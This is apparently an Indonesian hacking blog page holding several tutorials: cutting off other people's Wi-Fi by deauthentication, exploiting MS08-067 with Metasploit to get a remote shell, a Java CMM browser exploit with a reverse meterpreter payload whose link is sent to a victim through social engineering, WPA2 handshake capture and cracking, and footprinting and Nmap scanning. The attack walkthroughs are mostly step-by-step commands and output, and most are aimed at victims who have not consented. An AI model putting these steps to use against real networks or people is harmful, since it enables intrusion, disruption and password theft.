Ads 468x60px

Sunday, August 31, 2014

Memutuskan koneksi Wifi Orang Lain dengan Backtrack


Perhatikan langkah saya dalam memutuskan jaringan wifi orang lain menggunakan Backtrack
1. Buka terminal lalu ketikkan ifconfig untuk memeriksa interface anda
    wlan0 adalah nama default pada Backtrack.
    
2. Aktifkan mode monitor dengan perintah :
     airmon-ng start wlan0
 
3. Mode monitor aktif. Untuk scanning korban, masukkan perintah :

     airodump-ng mon0
    ctrl+C untuk menghentikan scanning. Tentukan target (Ex:70:f1:a1:b2:72:77)
    
4.Langkah memutuskan jaringan korban, masukkan perintah berikut

     aireplay-ng -0 jumlahpaket -a BSSID -c Macadresskorban mon0

    Jumlah paket : lamanya pemutusan jaringan tergantung banyaknya pket
    untuk BSSID
    Contoh : (aireplay-ng -0 500 -a 11:22:33:44:55:66 -c 70:f1:a1:b2:72:77 mon0)

     
Proses berhasil jika tampak seperti dibawah ini
Reade more >>

Wednesday, August 27, 2014

Teknik Dasar Metasploit

Posting ini kubuat sebagai salah satu contoh audit security halah.. pentest aja yah bahasanya di network lokal tempatku bekerja. Ndak pake kata-kata hacking lah.. Wong cuman manfaatin tools yang disebar di inet kok disebut hacking :p. Soalnya banyak kale yang test metasploit seperti ini dan dibilang hacking bla-bla-bla. :-p. Go to side corner lamerzz... silahkan coba sendiri ya. cara yang paling mudah sebenarnya bisa menggunakan OS BackTrack, tapi disini saya menggunakan ubuntu yang telah diinstall metasploit. Langkah instalasinya bisa dilihat disini.

Metasploit : msfconsole
Lets go.. pertama kali kita coba dengan testing manual menggunakan metasploit console (msfconsole) yang mana test ini dilakukan pada single mesin windows xp sp2 dengan melakukan percoban exploit ms windows MS08-067 yaitu vulner pada microsoft windows di port 445 beberapa waktu yang lalu yang sempet bikin microsoft kelimpungan :D . Dari terminal console ketik perintah berikut, seperti pada gambar dibawah:

$ msfconsole


Untuk perintah-perintah lainnya bisa dipelajari dengan mengetikkan help :
    msf > help
    Core Commands
    =============
    
    Command       Description
    -------       -----------
    ?             Help menu
    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    connect       Communicate with a host
    exit          Exit the console
    help          Help menu
    info          Displays information about one or more module
    irb           Drop into irb scripting mode
    jobs          Displays and manages jobs
    load          Load a framework plugin
    loadpath      Searches for and loads modules from a path
    quit          Exit the console
    resource      Run the commands stored in a file
    route         Route traffic through a session
    save          Saves the active datastores
    search        Searches module names and descriptions
    sessions      Dump session listings and display information about sessions
    set           Sets a variable to a value
    setg          Sets a global variable to a value
    show          Displays modules of a given type, or all modules
    sleep         Do nothing for the specified number of seconds
    unload        Unload a framework plugin
    unset         Unsets one or more variables
    unsetg        Unsets one or more global variables
    use           Selects a module by name
    version       Show the framework and console library version numbers
Untuk melihat list exploits-nya , gunakan perintah :
    msf > show exploits
List seluruh exploit yang ada kira-kira seperti ini (saya paste sebagian saja biar ndak terlalu panjang) :
    windows/smb/ms05_039_pnp              Microsoft Plug and Play Service Overflow
    windows/smb/ms06_025_rasmans_reg      Microsoft RRAS Service RASMAN Registry Overflow
    windows/smb/ms06_025_rras             Microsoft RRAS Service Overflow
    windows/smb/ms06_040_netapi           Microsoft Server Service NetpwPathCanonicalize Overflow
    windows/smb/ms06_066_nwapi            Microsoft Services MS06-066 nwapi32.dll
    windows/smb/ms06_066_nwwks            Microsoft Services MS06-066 nwwks.dll
    windows/smb/ms08_067_netapi           Microsoft Server Service Relative Path Stack Corruption
Scan mesin target menggunakan nmap. Dalam contoh kasus kali ini kita gunakan kompi dg ip 192.168.1.28 :
    msf > sudo nmap -v -sS -A -O 192.168.1.28
    [*] exec: sudo nmap -v -sS -A -O 192.168.1.28
    [sudo] password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2009-03-21 23:50 CIT
    Initiating ARP Ping Scan at 23:50
    Scanning 192.168.1.28 [1 port]
    Host 192.168.1.28 appears to be up ... good.
    Interesting ports on 192.168.1.28:
    Not shown: 1712 closed ports
    PORT    STATE SERVICE      VERSION
    135/tcp open  msrpc        Microsoft Windows RPC
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
    MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=258 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OS: Windows
Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka. Mari kita coba kompi ini dengan menggunakan exploit windows/smb/ms08_067_netapi.
    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) >
Lihat opsi dari exploit ini dengan mengetikkan show options :
    msf exploit(ms08_067_netapi) > show options
    Module options:
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    RHOST                     yes       The target address
    RPORT    445              yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Exploit target:
    Id  Name
    --  ----
    0   Automatic Targeting
Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :
    msf exploit(ms08_067_netapi) > set rhost 192.168.1.28
    rhost => 192.168.1.28
Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :
    msf exploit(ms08_067_netapi) > show targets
    Exploit targets:
    Id  Name
    --  ----
    0   Automatic Targeting
    1   Windows 2000 Universal
    2   Windows XP SP0/SP1 Universal
    3   Windows XP SP2 English (NX)
    4   Windows XP SP3 English (NX)
    -------- cut -----------
Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :
    msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
    payloads => windows/shell_bind_tcp
Untuk melihat payload apa saja dalam metasploit, gunakan perintah :
    msf exploit(ms08_067_netapi) > show payloads
    Compatible payloads
    ===================
    Name                                            Description
    ----                                            -----------
    generic/debug_trap                Generic x86 Debug Trap
    generic/debug_trap/bind_ipv6_tcp  Generic x86 Debug Trap, Bind TCP Stager (IPv6)
    generic/debug_trap/bind_nonx_tcp  Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
    generic/debug_trap/bind_tcp       Generic x86 Debug Trap, Bind TCP Stager
    ----------- dipotong sampai disini ---------------
Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :
    msf exploit(ms08_067_netapi) > show options
    Module options:
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    RHOST    192.168.1.28     yes       The target address
    RPORT    445              yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Payload options (windows/shell_bind_tcp):
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  thread           yes       Exit technique: seh, thread, process
    LPORT     4444             yes       The local port
    RHOST     192.168.1.28     no        The target address
    Exploit target:
    Id  Name
    --  ----
    0   Automatic Targeting
sekarang jalankan exploit :
    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)
    
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\WINDOWS\system32>ipconfig
    ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
    
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.28
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254
    
    C:\WINDOWS\system32>
Dan ternyata emang masih bolong… :p
Metasploit : msfcli
Dari langkah-langkah diatas… sebenarnya bisa dilakukan exploitasi dengan menggunakan satu perintah dari console, dan diakomodir dengan menggunakan msfcli yang notabene sebenarnya adalah metasploit command line interface.
Untuk melihat manual perintahnya bisa dilihat dari help maupun manpage-nya wiki-nya metasploit.
    bash-4.1$ msfcli –help
    [*] Please wait while we load the module tree...
    Error: Invalid module: --help
    Usage: /usr/local/bin/msfcli   [mode]
    =================================================================
    Mode           Description
    ----           -----------
    (H)elp         You're looking at it baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module
So.. mari kita coba. Contoh kasusnya sama seperti artikel msfconsole biar ndak capek nulisnya yaitu:
    IP Addr Target : 192.168.1.28
    Port target : 445
    Exploit  : windows/smb/ms08_067_netapi
    Payload  : windows/shell_bind_tcp
    Exploit target : 0
Dan implementasinya menjadi seperti ini :
    bash$ msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.1.28 TARGET=0 PAYLOAD=generic/shell_bind_tcp E
    [*] Please wait while we load the module tree...
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Command shell session 1 opened (192.168.1.6:36804 -> 192.168.1.28:4444)
    
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\WINDOWS\system32>ipconfig
    ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.28
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254
    C:\WINDOWS\system32>
Implementasi yang sama juga bisa dilakukan pada metasploit GUI (msfgui) dan metasploit berbasis web (msfweb). Silahkan dicoba sendiri karena saya malas upload gambarnya :-p. Dari teknik dasar ini silahkan dikembangkan dengan teknik-teknik yang lain.
Reade more >>

Tuesday, August 26, 2014

Hack Windows PC Menggunakan Java CMM Remote Code Execution


Modul ini merupakan pelanggaran kelas Color Management dari Java Applet untuk menjalankan kode Java tanpa ijin  di luar sandbox yang dieksploitasi  pada bulan Februari dan Maret 2013. Kerentanan tersebut mempengaruhi Java versi 7u15 dan sebelumnya, 6u41 dan sebelumnya dan telah berhasil diuji pada sistem Windows XP SP3 dan Windows 7 SP1. Mengeksploitasi ini tidak mem-by-pass klik-to-play, sehingga pengguna harus menerima peringatan java untuk menjalankan applet berbahaya.


Exploit Targets
 Java 7 Update 15
Windows PC

Requirement
Attacker: Kali Linux
Victim PC: Windows 7
Jalankan terminal backtrack / Kali linux dan ketikkan msfconsole

Sekarang ketik use exploit/windows/browser/java_cmm
msf exploit (java_cmm)>set payload windows/meterpreter/reverse_tcp
msf exploit (java_cmm)>set lhost 192.168.1.8 (IP of Local Host)
msf exploit (java_cmm)>set srvhost 192.168.1.8 (alamat komputer lokal)
msf exploit (java_cmm)>set uripath / (Url yang digunakan untuk exploit ini)
msf exploit (java_cmm)>exploit 



Sekarang Anda harus memberikan URL kepada korban Anda http://192.168.1.8:8080



Kirim link server ke korban melalui chatting atau email atau teknik rekayasa sosial lainya.

Sekarang Anda memiliki akses ke PC korban. Gunakan "sessions -l" dan nomor sesi untuk menghubungkan ke sesi. Kemudian Ketik "sessions -i ID". (lihat pada gambar)






Sekarang anda telah berhasil menguasai komputer korban.

Reade more >>

Install Flash Player Untuk Iceweasel / Firefox di Kali Linux

Tutorial cara menginstal flash player ini udah banyak banget bertebaran di internet, tapi gak ada salahnya ditulis lagi disini karena mungkin masih ada yang belum tau dan masih menghadapi masalah dalam instalasi. Sekarang saya akan berbagi 3 langkah mudah untuk menginstal flash player di Kali Linux yang sudah saya lakukan dan berhasil.

Langkah # 01

Jalankan browser dan download Flash Player di http://get.adobe.com/flashplayer/ lalu simpan di sebuah folder.
(Catatan: download versi tar.gz For Other Linux)

Langkah # 02 

Buka terminal dan masuk ke folder di mana file flash yang didownload disimpan kemudian jalankan perintah berikut.
tar xzvf install_flash_player_11_linux.i386.tar.gz
atau
tar xzvf install_flash_player_11_linux.x86_64.tar.gz

Jika file yang kamu didownload memiliki  nama yang lain maka sesuaikan saja perintahnya.

tar xzvf nama_file.tar.gz
Langkah # 3
Tetap berada di folder tempat kamu meng-extract file yang didownload tadi, dan jalankan perintah berikut
cp libflashplayer.so /usr/lib/mozilla/plugins/

Selamat! Sekarang kamu sudah berhasil menginstall flash player. Mau nonton video di youtube atau main game terserah kamu.
Reade more >>

Sunday, August 24, 2014

cara menggunakan maltego

Apa itu Maltego ? =))
Maltego adalah program yang dapat digunakan untuk menentukan informasi hubungan antar :
-Domains
-DNS names
-Netblocks
-IP addresses
-Orang
– Dan masih banyak lagi (sesuai mode pada Entitas)
Cara menggunakan Maltego sangatlah mudah, berikut step by stepnya :
–Tampilan awal Maltego.
–Masukin Entitas / atau sigup juga bisa biar dapat entitas resmi dari site resminya.
–Drag mode Entitas domain ke area frame.
Oke kali ini kita menggunakan facebook sebagai target, nah langsung aja test. Untuk menetukan domain yang mau kita scan,silahkan di double klik icon entitas domain yang tadi di drag, lalu rename sesuai target url atau double klik tab property view yang ada disebelah kanan, lalu rename domain name.
–Klik kanan icon entitas-nya ,lalu klik Run Transform —> All Transform.
–running dan silahkan mengintip =))
–nih lirik full screen-shot biar lebih jelas =)) .
nah sudah saya screen-shot tuh sedikit tentang infrastruktur dari www.facebook.com.
di situ kita bisa melihat settingan struktur dari Foto facebook, Grup Facebook , dan masih banyak yang lain.
oke, sebenarnya masih banyak mode Entitas yg menarik, misalnya
melacak orang- melacak nomor telpon – dll (Matego Full Version) .
Reade more >>

How To Hack WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng

          Kali Linux can be used for many things, but it probably is best known for its “ability” to hack WPA and WPA2. There are hundreds of tools for windows that claim they can hack into WPA; don’t get them! They’re just scams. There is only one real way to hack into a WPA network, and that is with a Linux-based OS, a wireless card capable of monitor mode, and aircrack-ng. Also note that, even with these tools, Wi-Fi cracking is not for beginners. Hacking it requires basic knowledge of how WPA authentication works, and moderate familiarity with Kali Linux and its tools. These are things that you’ll need:
If you have these then roll up your sleeves and let’s get to it.
          Important notice: Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in most countries. We are performing this tutorial for the sake of penetration testing, and are hacking into our own test router to do so.
By reading and/or using the information below, you are agreeing to
our Disclaimer, which can be found here: http://lewiscomputerhowto.blogspot.com/disclaimor.html

Step One:
Start Kali Linux and login, preferably as root.
Step 1
Step Two:
Plugin your injection-capable wireless adapter, (Unless your computer card supports it). If you’re using Kali in VMware, then you might have to connect the card via the imageicon in the device menu.
Step Three:
Disconnect from all wireless networks, open a Terminal, and type airmon-ng
Step 3
This will list all of the wireless cards that support monitor (not injection) mode. If no cards are listed, try disconnecting and reconnecting the card and check that it supports monitor mode. You can check if the card supports monitor mode by typing ifconfig in another terminal, if the card is listed in ifconfig, but doesn’t show up in airmon-ng, then the card doesn’t support it.
You can see here that my card supports monitor mode and that it’s listed as wlan0.

Step Four:
Type airmon-ng start followed by the interface of your wireless card. mine is wlan0, so my command would be: airmon-ng start wlan0
Step 4
The “(monitor mode enabled)” message means that the card has successfully been put into monitor mode. Note the name of the new monitor interface, mine is mon0.
Step Five:
Type airodump-ng followed by the name of the new monitor interface, which is probably mon0.
Step 5
Step Six:
Airodump will now list all of the wireless networks in your area, and lots of useful information about them. Locate your network or the network that you have permission to penetration test. Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the process. Note the channel of your target network.
step 6
Step Seven:
Copy the BSSID of the target network
Step 7
Now type this command:
airodump-ng –c [channel] –bssid [bssid] –w /root/Desktop/ [monitor interface]Replace [channel] with the channel of your target network. Paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface, (mon0).

A complete command should look like this:
airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

image
Now press enter.
Step Eight:
Airodump with now monitor only the target network, allowing us to capture more specific information about it. What we’re really doing now is waiting for a device to connect or reconnect to the network, forcing the router to send out the four-way handshake that we need to capture in order to crack the password.
Also, four files should show up on your desktop, this is where the handshake will be saved when captured, so don’t delete them!

But we’re not really going to wait for a device to connect, no, that would take too long. We’re actually going to use another cool-tool that belongs to the aircrack suite called aireplay-ng, to speed up the process. Instead of waiting for a device to connect, we’re going to use this tool to force a device to reconnect by sending deauthentication (deauth) packets to the device, making it think that it has to reconnect with the router.
Of course, in order for this tool to work, there has to be someone else connected to the network first, so watch the airodump-ng and wait for a client to show up. It might take a long time, or it might only take a second before the first one shows. If none show up after a lengthy wait, then the network might be empty right now, or you’re to far away from the network.

You can see in this picture, that a client has appeared on our network, allowing us to start the next step.

Step 8
Step Nine:
leave airodump-ng running and open a second terminal. In this terminal, type this command:
aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0The –0 is a short cut for the deauth mode and the 2 is the number of deauth packets to send.
-a indicates the access point (router)’s bssid, replace [router bssid] with the BSSID of the target network, which in my case, is 00:14:BF:E0:E8:D5.
-c indicates the clients BSSID, noted in the previous picture. Replace the [client bssid] with the BSSID of the connected client, this will be listed under “STATION.”
And of course, mon0 merely means the monitor interface, change it if yours is different.

My complete command looks like this:
aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0

Step 9
Step Ten:
Upon hitting Enter, you’ll see aireplay-ng send the packets, and within moments, you should see this message appear on the airodump-ng screen!
image

step 10
This means that the handshake has been captured!Open-mouthed smile You can close the aireplay-ng terminal and hit Ctrl + C on the airodump-ng terminal to stop monitoring the network, but don’t close it yet just incase you need some of the information later.
Step 11:
This concludes the external part of this tutorial. From now on, the process is entirely between your computer, and those four files on your Desktop. Actually, the .cap one, that is important. Open a new Terminal, and type in this command:
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

-a is the method aircrack will use to crack the handshake, 2=WPA method.
-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the password, the * means wild card in Linux, and since I’m assuming that there are no other .cap files on your Desktop, this should work fine the way it is.

My complete command looks like this:
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt  /root/Desktop/*.cap
image

Now press Enter.
Step 12:
Aircrack-ng will now launch into the process of cracking the password. However, it will only crack it if the password happens to be in the wordlist that you’ve selected. Sometimes, it’s not. If this is the case, then you can congratulate the owner on being “Impenetrable,” of course, only after you’ve tried every wordlist on the internet!
Cracking the password might take a long time depending on the size of the wordlist. Mine went very quickly.
If the phrase is in the wordlist, then aircrack-ng will show it too you like this:

image

The passphrase to our test-network was notsecure, and you can see here that aircrack found it!
If you see a message similar to this, then your tests have penetrated the network. Tell the owner that he needs a stronger password!
Reade more >>

FOOTPRINTING

 

ABSTRACT
Dengan semakin berkembang dan populernya jaringan nirkabel, menyebabkan munculnya isu-isu keamanan pada jaringan nirkabel. Serangan terhadap jaringan nirkabel pun berkembang. Teknik paling awal sekali yang harus dilakukan oleh seorang hacker sebelum serangan di lakukan adalah melakukan proses footprinting, atau dalam bahasa keren-nya intelejen awal tentang segala sesuatu yang berkaitan dengan target yang dituju. Dengan cara ini seorang penyerang akan memperoleh profile / postur keamanan yang lengkap dari organisasi / jaringan yang akan di serang.

DASAR TEORI


PENGERTIAN FOOTPRINTING
§  Footprinting adalah segala kegiatan mengumpulkan informasi target yang akan di-hack sistemnya, sebelum melakukan penguasaan sistem sesungguhnya. Atau Footprinting, merupakan seni mencari / mengumpulkan informasi yang berkaitan dengan target yang akan diserang. Misal jika seseorang ingin merampok bank yang dilakukan terlebih dahulu adalah kantor bank itu berada, dimana biasa kasir menyimpan uang, rute bank untuk persiapan melarikan diri dan berbagai hal yang berkaitan dengan target. Mengapa proses footprinting ini penting? Karena menurut Certified Ethical Hacker (CEH), 90% waktu seorang hacker dan cracker dihabiskan untuk mengumpulkan informasi, sedangkan 10% untuk melakukan percobaan menguasai sistem server atau router.
Footprinting dapat dibagi 2 yaitu
1.    inner footprinting dan
2.    outer footprinting.

Inner footprinting adalah pencarian informasi terhadap suatu situs dimana Anda sudah berada di dalam jaringan komputer tersebut (Anda sudah berada didalam gedungnya dan menggunakan fasilitas internet gratis).
Outer Footprinting adalah pencarian informasi terhadap suatu situs dimana Anda tidak berada di dalam jaringan komputer target (Anda berada jauh dari komputer target).

LANGKAH - LANGKAH FOOTPRINTING
Pada dasarnya ada empat (4) langkah utama yang biasanya dilakukan untuk melakukan intelejen awal untuk melihat scope situasi target sasaran. Langkah ini dikenal sebagai footprinting, yaitu:
1.    Menentukan Scope Aktifitas / Serangan
2.    Network Enumeration
3.    interogasi DNS (domain name).
4.    Mengintai Jaringan.
Penjelasan ;

1.    Menentukan Scope Aktifitas / Serangan
Pada tahapan 1 ini, kita perlu memperoleh sebanyak mungkin informasi yang berkaitan dengan lokasi,berita akusisi, nomor telepon, kontak person ,e-mail address mereka, masalah privasi kebijakan keamanan yang di terapkan, link ke berbagai situs Web lain yang berhubungan dan  lain-lain.
Bagi sistem administrator yang ingin melawan hal ini, ada baiknya membaca-baca RFC 2196 Site Security Handbook yang bisa di download dari http://www.ietf.org/rfc/rfc2196.txt.

2.    Network Enumeration
Network Enumeration dilakukan untuk melihat domain yang digunakan oleh sebuah organisasi. Untuk melihat domain tersebut bisa dilakukan dengan beberapa langkah, yaitu :
a.    Melihatnya lewat internet / web di https://register.pandi.or.id/registrant?navigation=tambah.


Setelah mengisi nama alamat web yang kita inginkan yaitu www.stikom-bali.ac.id  maka hasilnya akan seperti berikut ;



Dari langkah diatas maka kita akan mendapatkan informasi dari nama alamat web tersebut seperti alamat domain, nama domain, jumlah server yang digunakan, dan lain-lain. Tapi web ini terbatas untuk server yang ada di Indonesia. Tapi jangan khawatir ada tempat untuk mengetahui informasi alamat yang ada di luar Indonesia yaitu di http://news.netcraft.com dengan web ini kita bisa mendapatkan informasi yang lebih mendetail tentang suatu web yang kita ingin selidiki.

b. Atau pun dengan cara ketik host www.stikom-bali.ac.id di terminal. Maka akan hasilnya sebagai berikut ;

c. Kita juga bisa menggunakan perintah Whois. Dimana whois adalah suatu prosedur untuk mendapatkan informasi mengenai sebuah domain. Informasi yang bisa di dapat meliputi siapa pemilik Domain, dimana alamatnya, no telepon, alamat email, kapan domain ini di daftarkan dan kapan domain ini akan expired.. Penggunaannya sangat sederhana sekali melalui terminal, cukup mengetik ;
 àwhois stikom-bali.ac.id
 seperti gambar berikut ;


3.    Interogasi DNS
Interogasi DNS adalah cara yang dilakukan dengan mengambil informasi Domain Name System (DNS).
Selain beberapa informasi lainnya tentang pemetaan alamat IP dengan hostname. Salah satu cara yang mungkin agak mudah untuk melakukan zone transfer,pada masa lalu, bisa dilakukan dengan mudah menggunakan perangkat lunak nslookup .
Cara menginstallnya tinggal mengetikan sudo apt-get install nslookup sama halnya dengan menginstall program-program lain yang ada di linux.
Setelah menginstall nslookup maka saat mengetik perintah nslookup stikom-bali.ac.id maka hasilnya akan sebagai berikut ;

Salah satu program Intrusion Detection yang gratis dan baik dapat diunduh di http://www.snort.org yang dibuat oleh Marty Roesch.
Bagi system administrator, teknik Intrusion Detection menjadi penting untuk dikuasai untuk menjaga adanya penyerang yang masuk dan melakukan pemetaan jaringan internal kita. Berupa pengumpulan informasi pada jaringan nirkabel yang akan dihack, informasi tersebut berupa SSID, channel, metode enkripsi, jumlah user, dan sebagainya. Tool atau aplikasi yang biasa digunakan adalah kismet.
Kismet merupakan pasive monitoring, sehingga klien atau penyerang menggunakan kismet hanya untuk menangkap informasi pada access point. Maksudnya kismet akan memberikan instruksi pada wireless card untuk mendengarkan semua channel yang ada dan menangkap semua informasi yang terdapat pada access point. Dengan demikian penyerang tidak perlu melakukan probe request yang mengakibatkan administrator mengetahui keberadaan penyerang. Informasi IP address dan MAC address yang didapat dari kismet menggunakan protokol ARP.

4.    Mengintai Jaringan
Langkah keempat atau terakhir dalam proses footprinting adalah melakukan pengintaian jaringan lawan,dalam bahasa Inggris-nya adalah network reconnaissance. Proses pengintaian dapat dilakukan dengan menggunakan perangkat lunak traceroute(di UNIX/Linux), atau menggunakan tracert (di Windows).
Traceroute merupakan perangkat lunak diagnostik yang pertama kali di kembangkan oleh salah satu sesepuh Internet yaitu Van Jacobson.Dengan mengakali parameter Time To Live (TTL) di paket IP agar setiap router yang dilewati mengirimkan berita ICMP_TIME_EXCEEDED, kita dapat memetakan rute yang diambil oleh sebuah paket dalam jaringan Internet.
Setelah mengetahui daftar alamat IP (IP address) dari berbagai host yang ada di target anda. Langkah selanjutnya adalah memetakan topologi jaringan, baik yang menuju ke target sasaran maupun konfigurasi internal jaringan target. Biasanya kita mengunakan software seperti
a. traceroute
Dengan software ini kita hanya ketik traceroute stikom-bali.ac.id atau dengan traceroute 202.146.237.203 (tapi sebelumnya install terlebih dahulu traceroute dengan mengetikan sudo apt-get install traceroute ) maka hasilnya :

b. Nmap
§ Nmap (Network Mapper) adalah sebuah aplikasi atau tool yang berfungsi untuk melakukan port scanning. digunakan untuk eksplorasi suatu jaringan komputer dan pemeriksaan sekuriti jaringan. Nmap dibuat oleh Gordon Lyon, atau lebih dikenal dengan nama Fyodor Vaskovich. Aplikasi ini digunakan untuk meng-audit jaringan yang ada. Dengan menggunakan tool ini, kita dapat melihat host yang aktif, port yang terbuka, Sistem Operasi yang digunakan, dan feature-feature scanning lainnya.
§  Perintah-perintah dasar di Nmap
Bentuk dasar dari perintah Nmap adalah :
"nmap <option> <target>"
Untuk melihat petunjuk penggunaan dari nmap, silakan gunakan perintah :
"nmap --h” atau " man nmap”
§  Kegunaan Nmap
1.    Nmap untuk Scan IP
Kegunaan Nmap disini jika kita menemui kasus kalau seandainya dalam suatu perusahaan memiliki network kelas C dengan 256 host, tidak mungkinkan kita meng-ngeping satu persatu untuk mengetahui IP yang aktif , maka Nmap memberikan solusi. Seandainya Anda ingin memeriksa apakah ada host yang aktif pada network kelas C dengan nomor IP 192.168.1.91 s/d 192.168.1.100 yang ada dalam perusahaan tersebut Maka Anda dapat memeriksa dengan perintah sebagai berikut: nmap -sP 192.168.1.91-100
Maka hasilnya sebagai berikut;

-sP adalah scanning dari Nmap berbasis ICMP,dimana umumnya digunakan untuk melakukan ping terhadap sejumlah IP sekaligus
  1. Nmap untuk Port Scanning
Selain itu Nmap juga berfungsi untuk Port scanning. Port scanning adalah proses koneksi ke port-port TCP pada host yang menjadi target untuk menentukan service apa yang sedang berjalan (Listening). Dengan mengidentifikasi port-port yang listening ini Anda dapat menentukan jenis aplikasi dan sistem operasi apa yang dipergunakan pada host tersebut. Service yang dalam status listening ini memungkinkan orang yang tidak berhak menerobos ke dalam host tersebut.
Untuk mengetahui port apa saja yang listening dari sebuah host dapat menggunakan cara sebagai berikut: #nmap -sS stikom-bali.ac.id

-sS à Stealth scan atau scan yang tidak terdeteksi
  1. Nmap untuk Mendeteksi OS
Untuk mengetahui OS yang ada atau yang kita inggin ketahui yaitu hanya dengan mengetikan nmap –O www.stikom-bali.ac.id atau nmap nmap –sS –O www.stikom-bali.ac.id (agar scan yang kita lakukan tidak terdeteksi ) maka hasilnya adalah sebagai berikut;

atau

 
§  Teknik scan  Nmap yang disesuaikan dengan medan tempur
a.  TCP connect scan -sT
Jenis scan ini terhubung ke port host target dan mengetahui  port yang ada, terfiltering atau tidak. Scan ini mudah terdeteksi oleh pengelola host target. Hasilnya adalah ;


b.   Scan –sF
Teknik ini mengirimkan suatu paket ke port host target.host target akan mengirim balik suatu RST untuk setiap port yang tertutup. Teknik ini hanya dapat dipakai pada stack TCP/IP berbasis Unix.hasilnya adalah sebagai berikut;


c.      Scan -sX
Teknik ini mengirimkan suatu paket.Jadi Host target akan mengembalikan suatu RST untuk semua port yang tertutup. Hasilnya adalah ;


d.   TCP Null scan -sN
Teknik ini membuat off semua flag. Hasilnya adalah ;


e.   TCP ACK scan -sA
Teknik ini digunakan untuk memetakan set aturan firewall. Hal ini sangat membantu Anda dalam menentukan apakah firewall yang dipergunakan adalah simple packet filter yang membolehkan hanya koneksi penuh saja (koneksi dengan bit set ACK) atau suatu firewall yang menjalankan advance packet filtering. Hasilnya adalah ;


f.    TCP Windows scan -sW
Untuk mendeteksi port-port terbuka ,terfilter/tidak terfilter pada sistem-sistem tertentu. seperti pada AIX dan Free BSD sehubungan dengan anomali dari ukuran windows TCPnya. hasilnya adalah ;
g.   TCP RPC Scan -sR
Teknik ini spesifik hanya pada sistem Unix dan digunakan untuk mendeteksi dan mengidentifikasi port RPC dan program serta nomor versi yang berhubungan dengannya.hasilnya adalah;
h.   UDP Scan -sU
